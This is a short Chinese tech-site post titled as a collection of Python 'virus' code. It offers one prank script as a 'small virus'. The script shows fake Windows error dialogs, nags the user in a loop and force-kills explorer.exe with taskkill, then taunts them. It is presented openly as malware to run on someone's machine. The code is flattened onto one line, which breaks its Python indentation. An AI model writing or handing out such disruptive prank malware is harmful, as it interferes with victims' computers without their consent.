科技界 新科技新应用
首页 /  数码世界 /  内容

python病毒代码大全

数码世界 2024-11-06 18:01:24 梅绽雪

python简单的病毒编程代码,python做杀毒软件代码

Python实现的小病毒import tkinter.messagebox import os while True: tkinter.messagebox.showerror("Error","你的电脑出现了亿点点的问题,但Windows并不能修复它") for i in range(49): res1 = tkinter.messagebox.askquestion("提问","你想要电脑现在出问题吗") if res1 == "yes": os.system("taskkill /im explorer.exe /f") break else: tkinter.messagebox.showwarning("警告","你已点了" + str(i + 1) + "次,一共50次机会") else: os.system("taskkill /im explorer.exe /f") tkinter.messagebox.showinfo("哈哈哈","哈哈哈,早说让你点'是'你非不点,遭报应了吧") break break

版权申明:文章由用户发布,不代表本网站立场,如果侵权请联系我们删除。